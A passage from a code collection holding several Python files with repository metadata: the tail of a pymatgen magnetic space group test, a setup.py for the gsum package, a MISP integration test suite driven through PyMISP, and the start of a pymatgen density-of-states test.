-x+1/2, -y, z+1/2, -1
-x+1/2, y+1/2, z+1/2, -1
x+1/2, y, -z+1/2, -1"""
self.assertStrContentEqual(msg_2_symmops, msg_2_symmops_ref)
msg_3_symmops = "\n".join([str(op) for op in self.msg_3.symmetry_ops])
msg_3_symmops_ref = """x, y, z, +1
x, -y, -z, +1
-x, y, -z+1/2, +1
-x, -y, z+1/2, +1
x, y+1/2, z+1/2, -1
x+1/2, -y, -z+1/2, -1
-x+1/2, y, -z, -1
-x+1/2, -y, z, -1
x+1/2, y+1/2, z, +1
x+1/2, -y+1/2, -z, +1
-x+1/2, y+1/2, -z+1/2, +1
-x+1/2, -y+1/2, z+1/2, +1
x+1/2, y, z+1/2, -1
x, -y+1/2, -z+1/2, -1
-x, y+1/2, -z, -1
-x, -y+1/2, z, -1"""
self.assertEqual(msg_3_symmops, msg_3_symmops_ref)
msg_4_symmops = "\n".join([str(op) for op in self.msg_4.symmetry_ops])
msg_4_symmops_ref = """x, y, z, +1
-x, -y, -z, +1
x+1/2, y, z, -1
-x+1/2, -y, -z, -1"""
self.assertEqual(msg_4_symmops, msg_4_symmops_ref)
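# Reading aid for the reference operator strings above: each operator is the familiar
# x, y, z coordinate triplet followed by a time-reversal flag, +1 for unprimed
# operations and -1 for primed (time-reversed) operations; this flag is what
# distinguishes a magnetic space group from its parent crystallographic group.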
def test_equivalence_to_spacegroup(self):
# the first 230 magnetic space groups have the same symmetry operations
# as the ordinary space groups, so they should give the same orbits
labels = ["Fm-3m", "Pnma", "P2/c", "P-1"]
points = [[0, 0, 0],
[0.5, 0, 0],
[0.11, 0.22, 0.33]]
for label in labels:
sg = SpaceGroup(label)
msg = MagneticSpaceGroup(label)
self.assertEqual(sg.crystal_system, msg.crystal_system)
for p in points:
pp_sg = np.array(sg.get_orbit(p))
pp_msg = np.array(msg.get_orbit(p, 0)[0]) # discarding magnetic moment information
pp_sg = pp_sg[np.lexsort(np.transpose(pp_sg)[::-1])] # sorting arrays so we can compare them
pp_msg = pp_msg[np.lexsort(np.transpose(pp_msg)[::-1])]
self.assertTrue(np.allclose(pp_sg, pp_msg))
def test_str(self):
msg = MagneticSpaceGroup([4, 11])
ref_string = """BNS: 4.11 P_b2_1
Operators: (1|0,0,0) (2y|0,1/2,0) (1|0,1/2,0)' (2y|0,0,0)'
Wyckoff Positions:
4e (x,y,z;mx,my,mz) (-x,y+1/2,-z;-mx,my,-mz) (x,y+1/2,z;-mx,-my,-mz)
(-x,y,-z;mx,-my,mz)
2d (1/2,y,1/2;mx,0,mz) (1/2,y+1/2,1/2;-mx,0,-mz)
2c (1/2,y,0;mx,0,mz) (1/2,y+1/2,0;-mx,0,-mz)
2b (0,y,1/2;mx,0,mz) (0,y+1/2,1/2;-mx,0,-mz)
2a (0,y,0;mx,0,mz) (0,y+1/2,0;-mx,0,-mz)
Alternative OG setting exists for this space group."""
ref_string_all = """BNS: 4.11 P_b2_1 OG: 3.7.14 P_2b2'
OG-BNS Transform: (a,2b,c;0,0,0)
Operators (BNS): (1|0,0,0) (2y|0,1/2,0) (1|0,1/2,0)' (2y|0,0,0)'
Wyckoff Positions (BNS):
4e (x,y,z;mx,my,mz) (-x,y+1/2,-z;-mx,my,-mz) (x,y+1/2,z;-mx,-my,-mz)
(-x,y,-z;mx,-my,mz)
2d (1/2,y,1/2;mx,0,mz) (1/2,y+1/2,1/2;-mx,0,-mz)
2c (1/2,y,0;mx,0,mz) (1/2,y+1/2,0;-mx,0,-mz)
2b (0,y,1/2;mx,0,mz) (0,y+1/2,1/2;-mx,0,-mz)
2a (0,y,0;mx,0,mz) (0,y+1/2,0;-mx,0,-mz)
Operators (OG): (1|0,0,0) (2y|0,1,0) (1|0,1,0)' (2y|0,0,0)'
Wyckoff Positions (OG): (1,0,0)+ (0,2,0)+ (0,0,1)+
4e (x,y,z;mx,my,mz) (-x,y+1,-z;-mx,my,-mz) (x,y+1,z;-mx,-my,-mz)
(-x,y,-z;mx,-my,mz)
2d (1/2,y,1/2;mx,0,mz) (-1/2,y+1,-1/2;-mx,0,-mz)
2c (1/2,y,0;mx,0,mz) (-1/2,y+1,0;-mx,0,-mz)
2b (0,y,1/2;mx,0,mz) (0,y+1,-1/2;-mx,0,-mz)
2a (0,y,0;mx,0,mz) (0,y+1,0;-mx,0,-mz)"""
self.assertStrContentEqual(str(msg), ref_string)
self.assertStrContentEqual(msg.data_str(), ref_string_all)
if __name__ == '__main__':
unittest.main()
|
mbkumar/pymatgen
|
pymatgen/symmetry/tests/test_maggroups.py
|
Python
|
mit
| 7,489
|
[
"pymatgen"
] |
b274a925fe606c74e2880bd260a07592686081bd0a576f87bac92c7d1a51fa92
|
from distutils.core import setup, Extension
# To build files manually, run: python setup.py build_ext --build-lib ./
# extensions = [Extension(
# name="gsum.cutils",
# sources=["gsum/cutils.pyx"],
# # depends=['gsl/gsl_linalg.h', 'gsl/gsl_permutation.h'],
# # libraries=[*cython_gsl.get_libraries()],
# # library_dirs=[cython_gsl.get_library_dir()],
# # include_dirs=[numpy.get_include(), cython_gsl.get_cython_include_dir()],
# )]
# Do not import build-time packages at module level; they may not be installed yet (they are pulled in via install_requires)
try:
from Cython.Build import cythonize, build_ext
except ImportError:
# If we couldn't import Cython, use the normal setuptools
# and look for a pre-compiled .c file instead of a .pyx file
from setuptools.command.build_ext import build_ext
ext_modules = [Extension("gsum.cutils", ["gsum/cutils.c"])]
else:
# If we successfully imported Cython, look for a .pyx file
ext_modules = cythonize([Extension("gsum.cutils", ["gsum/cutils.pyx"])])
class CustomBuildExtCommand(build_ext):
"""build_ext command for use when numpy/cython_gsl headers are needed."""
def run(self):
# Import numpy here, only when headers are needed
import numpy
import cython_gsl
# Add the headers
self.libraries = cython_gsl.get_libraries()
self.library_dirs.append(cython_gsl.get_library_dir())
self.include_dirs.append(numpy.get_include())
self.include_dirs.append(cython_gsl.get_include())
self.include_dirs.append(cython_gsl.get_cython_include_dir())
# Call original build_ext command
build_ext.run(self)
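# The deferred imports above follow a common setup.py pattern: numpy and cython_gsl are
# imported only inside run(), i.e. at build time rather than when setup.py is first
# parsed, so the script itself can be loaded on an environment where the build
# dependencies are not installed yet. A minimal sketch of the same idea (illustrative
# only, names hypothetical):
#
#     class build_ext_with_numpy(build_ext):
#         def run(self):
#             import numpy                      # only needed once headers are required
#             self.include_dirs.append(numpy.get_include())
#             build_ext.run(self)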
setup(
name='gsum',
packages=['gsum'],
cmdclass={'build_ext': CustomBuildExtCommand},
ext_modules=ext_modules,
version='0.3',
description='A Bayesian model of series convergence using Gaussian sums',
author='Jordan Melendez',
author_email='jmelendez1992@gmail.com',
license='MIT',
url='https://github.com/buqeye/gsum.git',
download_url='',
keywords='EFT nuclear model gaussian process uncertainty quantification buqeyemodel buqeye',
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Physics'
],
install_requires=[
'Cython',
'CythonGSL',
'docrep',
'gsl',
'numpy>=1.12.0',
'pandas',
'scipy>=1.4.0',
'seaborn',
'statsmodels',
'matplotlib',
'scikit-learn',
]
)
|
jordan-melendez/buqeyemodel
|
setup.py
|
Python
|
mit
| 2,844
|
[
"Gaussian"
] |
acf9b5453088d5e2a0ffda9f3f674d10b79b239b661bb8bc1c1866931fcd0069
|
#!/usr/bin/env python3
import os
import json
import uuid
import subprocess
import unittest
from xml.etree import ElementTree as ET
from io import BytesIO
import urllib3 # type: ignore
import logging
logging.disable(logging.CRITICAL)
logger = logging.getLogger('pymisp')
from pymisp import PyMISP, MISPOrganisation, MISPUser, MISPRole, MISPSharingGroup, MISPEvent, MISPLog, MISPSighting, Distribution, ThreatLevel, Analysis, MISPEventReport, MISPServerError
# Load access information from environment variables
url = "http://" + os.environ["HOST"]
key = os.environ["AUTH"]
urllib3.disable_warnings()
def create_simple_event():
event = MISPEvent()
event.info = 'This is a super simple test'
event.distribution = Distribution.your_organisation_only
event.threat_level_id = ThreatLevel.low
event.analysis = Analysis.completed
event.add_attribute('text', str(uuid.uuid4()))
return event
def check_response(response):
if isinstance(response, dict) and "errors" in response:
raise Exception(response["errors"])
return response
class MISPSetting:
def __init__(self, admin_connector: PyMISP, new_setting: dict):
self.admin_connector = admin_connector
self.new_setting = new_setting
def __enter__(self):
self.original = self.__run("modify", json.dumps(self.new_setting))
# Try to reset config cache
self.admin_connector.get_server_setting("MISP.live")
def __exit__(self, exc_type, exc_val, exc_tb):
self.__run("replace", self.original)
# Try to reset config cache
self.admin_connector.get_server_setting("MISP.live")
@staticmethod
def __run(command: str, data: str) -> str:
dir_path = os.path.dirname(os.path.realpath(__file__))
r = subprocess.run(["php", dir_path + "/modify_config.php", command, data], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if r.returncode != 0:
raise Exception([r.returncode, r.stdout, r.stderr])
return r.stdout.decode("utf-8")
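# Hypothetical usage sketch for the MISPSetting helper above (illustrative only): it is
# a context manager that temporarily overrides server settings via modify_config.php and
# restores the previous values on exit, e.g.
#
#     with MISPSetting(admin_misp_connector, {"MISP.enableEventBlocklisting": True}):
#         ...  # code in this block sees the overridden configuration
#
# where `admin_misp_connector` is an admin-level PyMISP instance.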
class TestComprehensive(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
# Connect as admin
cls.admin_misp_connector = PyMISP(url, key, ssl=False, debug=False)
cls.admin_misp_connector.set_server_setting('debug', 1, force=True)
# Creates an org
organisation = MISPOrganisation()
organisation.name = 'Test Org'
cls.test_org = cls.admin_misp_connector.add_organisation(organisation, pythonify=True)
# Set the default role (id 3 on the VM)
cls.admin_misp_connector.set_default_role(3)
# Creates a user
user = MISPUser()
user.email = 'testusr@user.local'
user.org_id = cls.test_org.id
cls.test_usr = cls.admin_misp_connector.add_user(user, pythonify=True)
cls.user_misp_connector = PyMISP(url, cls.test_usr.authkey, ssl=False, debug=True)
@classmethod
def tearDownClass(cls):
# Delete user
cls.admin_misp_connector.delete_user(cls.test_usr)
# Delete org
cls.admin_misp_connector.delete_organisation(cls.test_org)
def setUp(self):
self.user_misp_connector.global_pythonify = True
self.admin_misp_connector.global_pythonify = True
def test_search_index(self):
# Search all events
index = self.user_misp_connector.search_index()
self.assertGreater(len(index), 0)
# Search published
index_published = self.user_misp_connector.search_index(published=True)
self.assertEqual(len(index_published), 0, "No event should be published.")
# Create test event
event = create_simple_event()
event = self.user_misp_connector.add_event(event)
check_response(event)
# Search by org name
index_org = self.user_misp_connector.search_index(org="Test Org")
self.assertGreater(len(index_org), 0)
# Search by org name with different case
index_org_lower = self.user_misp_connector.search_index(org="test org")
self.assertGreater(len(index_org_lower), 0)
# Search by org uuid
index_org_uuid = self.user_misp_connector.search_index(org=self.test_org.uuid)
self.assertGreater(len(index_org_uuid), 0)
# Search by org ID
index_org_id = self.user_misp_connector.search_index(org=self.test_org.id)
self.assertGreater(len(index_org_id), 0)
self.assertEqual(len(index_org), len(index_org_lower))
self.assertEqual(len(index_org), len(index_org_uuid))
self.assertEqual(len(index_org), len(index_org_id))
self.user_misp_connector.delete_event(event)
def test_search_index_by_info(self):
event = create_simple_event()
event.info = uuid.uuid4()
# No event should exist yet
index = self.user_misp_connector.search_index(eventinfo=event.info)
self.assertEqual(len(index), 0, "No event should exist")
event = self.user_misp_connector.add_event(event)
check_response(event)
# One event should exist
index = self.user_misp_connector.search_index(eventinfo=event.info)
self.assertEqual(len(index), 1)
self.assertEqual(index[0].uuid, event.uuid)
index = self.user_misp_connector.search_index(eventinfo="!" + str(event.info))
for index_event in index:
self.assertNotEqual(event.uuid, index_event.uuid, index)
self.user_misp_connector.delete_event(event)
def test_search_index_by_all(self):
event = create_simple_event()
index = self.user_misp_connector.search_index(all=event.attributes[0].value)
self.assertEqual(len(index), 0, "No event should exist")
event = self.user_misp_connector.add_event(event)
check_response(event)
index = self.user_misp_connector.search_index(all=event.attributes[0].value)
self.assertEqual(len(index), 1, "One event should exist")
self.assertEqual(index[0].uuid, event.uuid)
index = self.user_misp_connector.search_index(all=event.attributes[0].value.upper())
self.assertEqual(len(index), 1, "One event should exist")
self.assertEqual(index[0].uuid, event.uuid)
self.user_misp_connector.delete_event(event)
def test_search_index_by_attribute(self):
event = create_simple_event()
index = self.user_misp_connector.search_index(attribute=event.attributes[0].value)
self.assertEqual(len(index), 0, "No event should exist")
event = self.user_misp_connector.add_event(event)
check_response(event)
index = self.user_misp_connector.search_index(attribute=event.attributes[0].value)
self.assertEqual(len(index), 1, "One event should exist")
self.assertEqual(index[0].uuid, event.uuid)
index = self.user_misp_connector.search_index(attribute=event.attributes[0].value.upper())
self.assertEqual(len(index), 1, "One event should exist")
self.assertEqual(index[0].uuid, event.uuid)
self.user_misp_connector.delete_event(event)
def test_search_index_by_tag(self):
tags = self.user_misp_connector.search_tags("tlp:red", True)
index = self.user_misp_connector.search_index(tags="tlp:red")
self.assertEqual(len(index), 0, "No event should exist")
index = self.user_misp_connector.search_index(tags=tags[0].id)
self.assertEqual(len(index), 0, "No event should exist")
event = create_simple_event()
event.add_tag("tlp:red")
event = self.user_misp_connector.add_event(event)
check_response(event)
index = self.user_misp_connector.search_index(tags="tlp:red")
self.assertEqual(len(index), 1, "One event should exist")
index = self.user_misp_connector.search_index(tags="tlp:red|not_exists")
self.assertEqual(len(index), 1, "One event should exist")
index = self.user_misp_connector.search_index(tags=["tlp:red", "not_exists"])
self.assertEqual(len(index), 1, "One event should exist")
index = self.user_misp_connector.search_index(tags=tags[0].id)
self.assertEqual(len(index), 1, "One event should exist")
index = self.user_misp_connector.search_index(tags="!tlp:red")
for index_event in index:
self.assertNotEqual(event.uuid, index_event.uuid, index)
index = self.user_misp_connector.search_index(tags="!" + str(tags[0].id))
for index_event in index:
self.assertNotEqual(event.uuid, index_event.uuid, index)
self.user_misp_connector.delete_event(event)
def test_search_index_by_email(self):
index = self.user_misp_connector.search_index(email=self.test_usr.email)
self.assertEqual(len(index), 0, index)
event = create_simple_event()
event = self.user_misp_connector.add_event(event)
check_response(event)
index = self.user_misp_connector.search_index(email=self.test_usr.email)
self.assertEqual(len(index), 1, "One event should exist")
self.user_misp_connector.delete_event(event)
def test_search_index_by_email_admin(self):
index = self.admin_misp_connector.search_index(email="no_existing_email@example.com")
self.assertEqual(len(index), 0, index)
index = self.admin_misp_connector.search_index(email=self.test_usr.email)
self.assertEqual(len(index), 0, index)
event = create_simple_event()
event = self.user_misp_connector.add_event(event)
check_response(event)
index = self.admin_misp_connector.search_index(email=self.test_usr.email)
self.assertEqual(len(index), 1, index)
# Search by partial match
index = self.admin_misp_connector.search_index(email="testusr@user")
self.assertEqual(len(index), 1, index)
self.user_misp_connector.delete_event(event)
def test_search_index_minimal(self):
# pythonify is not supported for minimal results
self.user_misp_connector.global_pythonify = False
minimal = self.user_misp_connector.search_index(minimal=True)
self.assertGreater(len(minimal), 0)
minimal_event = minimal[0]
self.assertIn("id", minimal_event)
self.assertIn("timestamp", minimal_event)
self.assertIn("sighting_timestamp", minimal_event)
self.assertIn("published", minimal_event)
self.assertIn("uuid", minimal_event)
self.assertIn("orgc_uuid", minimal_event)
for event in minimal:
self.assertFalse(event["published"], "No event should be published.")
def test_search_index_minimal_published(self):
# pythonify is not supported for minimal results
self.user_misp_connector.global_pythonify = False
index = self.user_misp_connector.search_index(minimal=True, published=True)
self.assertEqual(len(index), 0, "No event should be published.")
index = self.user_misp_connector.search_index(minimal=True)
not_published = self.user_misp_connector.search_index(minimal=True, published=0)
both_2 = self.user_misp_connector.search_index(minimal=True, published=2)
both_array = self.user_misp_connector.search_index(minimal=True, published=[0, 1])
self.assertEqual(len(index), len(not_published))
self.assertEqual(len(index), len(both_2))
self.assertEqual(len(index), len(both_array))
def test_search_index_minimal_by_org(self):
# pythonify is not supported for minimal results
self.user_misp_connector.global_pythonify = False
# Create test event
event = create_simple_event()
event = self.user_misp_connector.add_event(event, pythonify=True)
check_response(event)
# Search by org name
minimal_org = self.user_misp_connector.search_index(minimal=True, org="Test Org")
self.assertGreater(len(minimal_org), 0)
for event in minimal_org:
self.assertEqual(event["orgc_uuid"], self.test_org.uuid)
# Search by org name with different case
minimal_org_lower = self.user_misp_connector.search_index(minimal=True, org="test org")
self.assertGreater(len(minimal_org), 0)
for event in minimal_org:
self.assertEqual(event["orgc_uuid"], self.test_org.uuid)
# Search by a non-existent org name
minimal_org_non_existing = self.user_misp_connector.search_index(minimal=True, org="Test Org that doesn't exist")
self.assertEqual(len(minimal_org_non_existing), 0)
# Search by org uuid
minimal_org_uuid = self.user_misp_connector.search_index(minimal=True, org=self.test_org.uuid)
self.assertGreater(len(minimal_org), 0)
for event in minimal_org:
self.assertEqual(event["orgc_uuid"], self.test_org.uuid)
# Search by a non-existent uuid
minimal_org_uuid_non_existing = self.user_misp_connector.search_index(minimal=True, org=uuid.uuid4())
self.assertEqual(len(minimal_org_uuid_non_existing), 0)
# Search by org ID
minimal_org_id = self.user_misp_connector.search_index(minimal=True, org=self.test_org.id)
self.assertGreater(len(minimal_org), 0)
for event in minimal_org:
self.assertEqual(event["orgc_uuid"], self.test_org.uuid)
self.assertEqual(len(minimal_org), len(minimal_org_lower))
self.assertEqual(len(minimal_org), len(minimal_org_uuid))
self.assertEqual(len(minimal_org), len(minimal_org_id))
# Negated search: exclude the org
minimal_org_not = self.user_misp_connector.search_index(minimal=True, org="!Test Org")
for event in minimal_org_not:
self.assertNotEqual(event["orgc_uuid"], self.test_org.uuid)
minimal_org_lower_not = self.user_misp_connector.search_index(minimal=True, org="!test org")
for event in minimal_org_lower_not:
self.assertNotEqual(event["orgc_uuid"], self.test_org.uuid)
minimal_org_uuid_not = self.user_misp_connector.search_index(minimal=True, org="!" + self.test_org.uuid)
for event in minimal_org_uuid_not:
self.assertNotEqual(event["orgc_uuid"], self.test_org.uuid)
minimal_org_id_not = self.user_misp_connector.search_index(minimal=True, org="!" + self.test_org.id)
for event in minimal_org_id_not:
self.assertNotEqual(event["orgc_uuid"], self.test_org.uuid)
self.assertEqual(len(minimal_org_not), len(minimal_org_lower_not))
self.assertEqual(len(minimal_org_not), len(minimal_org_uuid_not))
self.assertEqual(len(minimal_org_not), len(minimal_org_id_not))
self.user_misp_connector.delete_event(event)
def test_delete_event_blocklist(self):
check_response(self.admin_misp_connector.set_server_setting('MISP.enableEventBlocklisting', 1))
# Create test event
event = create_simple_event()
event = self.user_misp_connector.add_event(event)
check_response(event)
# Delete event
check_response(self.user_misp_connector.delete_event(event))
check_response(self.admin_misp_connector.set_server_setting('MISP.enableEventBlocklisting', 0))
def test_deleted_attributes(self):
# Create test event
event = create_simple_event()
event.add_attribute('text', "deleted", deleted=True)
event.add_attribute('text', "not-deleted")
event = self.user_misp_connector.add_event(event)
check_response(event)
# Not deleted
fetched_event = self.user_misp_connector.get_event(event)
check_response(fetched_event)
self.assertEqual(len(fetched_event.attributes), 2, fetched_event)
# Not deleted
fetched_event = self.user_misp_connector.get_event(event, deleted=0)
check_response(fetched_event)
self.assertEqual(len(fetched_event.attributes), 2, fetched_event)
# Include deleted
fetched_event = self.user_misp_connector.get_event(event, deleted=1)
check_response(fetched_event)
self.assertEqual(len(fetched_event.attributes), 3, fetched_event)
# Deleted only
fetched_event = self.user_misp_connector.get_event(event, deleted=2)
check_response(fetched_event)
self.assertEqual(len(fetched_event.attributes), 1, fetched_event)
# Both
fetched_event = self.user_misp_connector.get_event(event, deleted=[0, 1])
check_response(fetched_event)
self.assertEqual(len(fetched_event.attributes), 3, fetched_event)
check_response(self.user_misp_connector.delete_event(event))
def test_view_event_exclude_local_tags(self):
event = create_simple_event()
event.add_tag({"name": "local", "local": 1})
event.add_tag({"name": "global", "local": 0})
event.attributes[0].add_tag({"name": "local", "local": 1})
event.attributes[0].add_tag({"name": "global", "local": 0})
event = self.admin_misp_connector.add_event(event)
check_response(event)
event_with_local_tags = self.admin_misp_connector.get_event(event)
check_response(event_with_local_tags)
self.assertEqual(len(event_with_local_tags.tags), 2)
self.assertEqual(len(event_with_local_tags.attributes[0].tags), 2)
event_without_local_tags = self.admin_misp_connector._check_json_response(self.admin_misp_connector._prepare_request('GET', f'events/view/{event.id}/excludeLocalTags:1'))
check_response(event_without_local_tags)
self.assertEqual(event_without_local_tags["Event"]["Tag"][0]["local"], 0, event_without_local_tags)
self.assertEqual(event_without_local_tags["Event"]["Attribute"][0]["Tag"][0]["local"], 0, event_without_local_tags)
check_response(self.admin_misp_connector.delete_event(event))
def test_publish_alert_filter(self):
check_response(self.admin_misp_connector.set_server_setting('MISP.background_jobs', 0, force=True))
first = create_simple_event()
first.add_tag('test_publish_filter')
first.threat_level_id = ThreatLevel.medium
second = create_simple_event()
second.add_tag('test_publish_filter')
second.threat_level_id = ThreatLevel.high
third = create_simple_event()
third.add_tag('test_publish_filter')
third.threat_level_id = ThreatLevel.low
four = create_simple_event()
four.threat_level_id = ThreatLevel.high
try:
# Enable autoalert on admin
self.admin_misp_connector._current_user.autoalert = True
check_response(self.admin_misp_connector.update_user(self.admin_misp_connector._current_user))
# Set publish_alert_filter tag to `test_publish_filter`
setting_value = {'AND': {'Tag.name': 'test_publish_filter', 'ThreatLevel.name': ['High', 'Medium']}}
check_response(self.admin_misp_connector.set_user_setting('publish_alert_filter', setting_value))
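            # With this filter an alert e-mail should only go out for events that both carry the
            # 'test_publish_filter' tag AND have a High or Medium threat level (the first and second events below).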
# Add events
first = check_response(self.admin_misp_connector.add_event(first))
second = check_response(self.admin_misp_connector.add_event(second))
third = check_response(self.admin_misp_connector.add_event(third))
four = check_response(self.admin_misp_connector.add_event(four))
# Publish events
for event in (first, second, third, four):
check_response(self.admin_misp_connector.publish(event, alert=True))
            # Email notifications should be sent only for the first and second events (they match the filter)
mail_logs = self.admin_misp_connector.search_logs(model='User', action='email')
log_titles = [log.title for log in mail_logs]
self.assertIn('Email to admin@admin.test sent, titled "[ORGNAME MISP] Event ' + str(first.id) + ' - Medium - TLP:AMBER".', log_titles)
self.assertIn('Email to admin@admin.test sent, titled "[ORGNAME MISP] Event ' + str(second.id) + ' - High - TLP:AMBER".', log_titles)
self.assertNotIn('Email to admin@admin.test sent, titled "[ORGNAME MISP] Event ' + str(third.id) + ' - Low - TLP:AMBER".', log_titles)
self.assertNotIn('Email to admin@admin.test sent, titled "[ORGNAME MISP] Event ' + str(four.id) + ' - High - TLP:AMBER".', log_titles)
finally:
# Disable autoalert
self.admin_misp_connector._current_user.autoalert = False
check_response(self.admin_misp_connector.update_user(self.admin_misp_connector._current_user))
# Delete filter
self.admin_misp_connector.delete_user_setting('publish_alert_filter')
# Reenable background jobs
check_response(self.admin_misp_connector.set_server_setting('MISP.background_jobs', 1, force=True))
# Delete events
for event in (first, second, third, four):
check_response(self.admin_misp_connector.delete_event(event))
def test_remove_orphaned_correlations(self):
result = self.admin_misp_connector._check_json_response(self.admin_misp_connector._prepare_request('GET', 'servers/removeOrphanedCorrelations'))
check_response(result)
self.assertIn("message", result)
def test_restsearch_event_by_tags(self):
first = create_simple_event()
first.add_tag('test_search_tag')
first.add_tag('test_search_tag_third')
first.add_tag('test_search_tag_both')
first = self.admin_misp_connector.add_event(first)
check_response(first)
second = create_simple_event()
second.add_tag('test_search_tag_second')
second.add_tag('test_search_tag_both')
second = self.admin_misp_connector.add_event(second)
check_response(second)
search_result = self.admin_misp_connector.search(metadata=True, tags=["non_exists_tag"])
self.assertEqual(0, len(search_result))
search_result = self.admin_misp_connector.search(metadata=True, tags=["test_search_tag"])
self.assertEqual(1, len(search_result))
self.assertEqual(first.id, search_result[0].id)
search_result = self.admin_misp_connector.search(metadata=True, tags="test_search_tag")
self.assertEqual(1, len(search_result))
self.assertEqual(first.id, search_result[0].id)
# Like style match
search_result = self.admin_misp_connector.search(metadata=True, tags=["test_search_tag%"])
self.assertEqual(2, len(search_result))
search_result = self.admin_misp_connector.search(metadata=True, tags=["test_search_tag_second"])
self.assertEqual(1, len(search_result))
self.assertEqual(second.id, search_result[0].id)
search_result = self.admin_misp_connector.search(metadata=True, tags=["!test_search_tag"])
search_result_ids = [event.id for event in search_result]
self.assertNotIn(first.id, search_result_ids)
self.assertIn(second.id, search_result_ids)
search_result = self.admin_misp_connector.search(metadata=True, tags={"NOT": ["test_search_tag"]})
search_result_ids = [event.id for event in search_result]
self.assertNotIn(first.id, search_result_ids)
self.assertIn(second.id, search_result_ids)
search_result = self.admin_misp_connector.search(metadata=True, tags={"NOT": "test_search_tag"})
search_result_ids = [event.id for event in search_result]
self.assertNotIn(first.id, search_result_ids)
self.assertIn(second.id, search_result_ids)
search_result = self.admin_misp_connector.search(metadata=True, tags=["test_search_tag", "test_search_tag_second"])
self.assertEqual(2, len(search_result))
search_result = self.admin_misp_connector.search(metadata=True, tags={"AND": ["test_search_tag", "test_search_tag_third"]})
self.assertEqual(1, len(search_result))
self.assertEqual(first.id, search_result[0].id)
search_result = self.admin_misp_connector.search(metadata=True, tags={"AND": ["test_search_tag", "test_search_tag_both"]})
search_result_ids = [event.id for event in search_result]
self.assertEqual(1, len(search_result_ids))
self.assertIn(first.id, search_result_ids)
check_response(self.admin_misp_connector.delete_event(first))
check_response(self.admin_misp_connector.delete_event(second))
def test_log_new_audit(self):
check_response(self.admin_misp_connector.set_server_setting('MISP.log_new_audit', 1, force=True))
event = create_simple_event()
event.add_tag('test_log_new_audit_tag')
event = check_response(self.admin_misp_connector.add_event(event))
check_response(self.admin_misp_connector.delete_event(event))
check_response(self.admin_misp_connector.set_server_setting('MISP.log_new_audit', 0, force=True))
audit_logs = self.admin_misp_connector._check_json_response(self.admin_misp_connector._prepare_request('GET', 'admin/audit_logs/index'))
check_response(audit_logs)
self.assertGreater(len(audit_logs), 0)
def test_add_tag_to_attachment(self):
event = create_simple_event()
with open(__file__, 'rb') as f:
event.add_attribute('attachment', value='testfile.py', data=BytesIO(f.read()))
event = check_response(self.admin_misp_connector.add_event(event))
attribute_uuids = [attribute.uuid for attribute in event.attributes if attribute.type == 'attachment']
self.assertEqual(1, len(attribute_uuids))
check_response(self.admin_misp_connector.tag(attribute_uuids[0], 'generic_tag_test'))
check_response(self.admin_misp_connector.delete_event(event))
def test_add_duplicate_tags(self):
event = create_simple_event()
event = check_response(self.admin_misp_connector.add_event(event))
        # Only the first tag should be added; the second call is a duplicate
check_response(self.admin_misp_connector.tag(event.uuid, 'generic_tag_test', local=True))
check_response(self.admin_misp_connector.tag(event.uuid, 'generic_tag_test', local=False))
fetched_event = check_response(self.admin_misp_connector.get_event(event))
self.assertEqual(1, len(fetched_event.tags), fetched_event.tags)
self.assertTrue(fetched_event.tags[0].local, fetched_event.tags[0])
def test_export(self):
event = create_simple_event()
event.add_attribute("ip-src", "1.2.4.5", to_ids=True)
event = check_response(self.admin_misp_connector.add_event(event))
result = self._search({'returnFormat': "openioc", 'eventid': event.id, "published": [0, 1]})
ET.fromstring(result) # check if result is valid XML
self.assertTrue("1.2.4.5" in result, result)
result = self._search({'returnFormat': "yara", 'eventid': event.id, "published": [0, 1]})
self.assertTrue("1.2.4.5" in result, result)
self.assertTrue("GENERATED" in result, result)
self.assertTrue("AS-IS" in result, result)
result = self._search({'returnFormat': "yara-json", 'eventid': event.id, "published": [0, 1]})
self.assertIn("generated", result)
self.assertEqual(len(result["generated"]), 1, result)
self.assertIn("as-is", result)
check_response(self.admin_misp_connector.delete_event(event))
def test_event_report_empty_name(self):
event = create_simple_event()
new_event_report = MISPEventReport()
new_event_report.name = ""
new_event_report.content = "# Example report markdown"
new_event_report.distribution = 5 # Inherit
try:
event = check_response(self.user_misp_connector.add_event(event))
new_event_report = self.user_misp_connector.add_event_report(event.id, new_event_report)
self.assertIn("errors", new_event_report)
finally:
self.user_misp_connector.delete_event(event)
def test_new_audit(self):
with MISPSetting(self.admin_misp_connector, {"MISP.log_new_audit": True}):
event = create_simple_event()
event = check_response(self.user_misp_connector.add_event(event))
self.user_misp_connector.delete_event(event)
def test_csp_report(self):
response = self.admin_misp_connector._prepare_request('POST', 'servers/cspReport', data={
"csp-report": {
"test": "test",
}
})
self.assertEqual(204, response.status_code)
def test_redacted_setting(self):
response = self.admin_misp_connector.get_server_setting('Security.salt')
self.assertEqual(403, response["errors"][0])
response = self.admin_misp_connector._prepare_request('GET', 'servers/serverSettingsEdit/Security.salt')
response = self.admin_misp_connector._check_json_response(response)
self.assertEqual(403, response["errors"][0])
def _search(self, query: dict):
response = self.admin_misp_connector._prepare_request('POST', 'events/restSearch', data=query)
response = self.admin_misp_connector._check_response(response)
check_response(response)
return response
if __name__ == '__main__':
unittest.main()
|
SteveClement/MISP
|
tests/testlive_comprehensive_local.py
|
Python
|
agpl-3.0
| 29,299
|
[
"Amber"
] |
909a4595687b467301d760323de34c4847288548fb33316c3f45d89bdd97a1a4
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import json
import os
import unittest
import numpy as np
from monty.serialization import loadfn
from pymatgen.core.structure import Structure
from pymatgen.core.periodic_table import Element
from pymatgen.electronic_structure.core import Orbital, OrbitalType, Spin
from pymatgen.electronic_structure.dos import (
DOS,
CompleteDos,
FermiDos,
LobsterCompleteDos,
)
from pymatgen.util.testing import PymatgenTest
class DosTest(unittest.TestCase):
def setUp(self):
with open(os.path.join(PymatgenTest.TEST_FILES_DIR, "complete_dos.json"), "r") as f:
self.dos = CompleteDos.from_dict(json.load(f))
def test_get_gap(self):
dos = self.dos
self.assertAlmostEqual(dos.get_gap(), 2.0589, 4)
self.assertEqual(len(dos.energies), 301)
self.assertAlmostEqual(
